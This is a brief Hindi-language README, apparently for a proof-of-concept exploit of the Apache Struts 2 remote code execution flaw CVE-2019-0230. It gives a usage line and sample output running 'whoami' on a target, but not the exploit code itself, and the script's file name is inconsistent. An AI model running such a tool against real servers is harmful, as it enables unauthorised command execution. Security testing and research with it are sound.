
Apache Struts 2 दूरस्थ कोड निष्पादन भेद्यता CVE-2019-0230 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, क्राफ्ट किए गए HTTP अनुरोधों के माध्यम से कमांड इंजेक्शन सक्षम करता है।
CVE-2019-0230 शोषण
यह CVE-2019-0230 शोषण है
python3 cve-2019-230.py <url or ip> <command>
उदाहरण:
# python3 cve-2019-0230-poc.py pentest.com whoami
Testing pentest.com!
Command being passed for RCE: whoami
2020/10/22/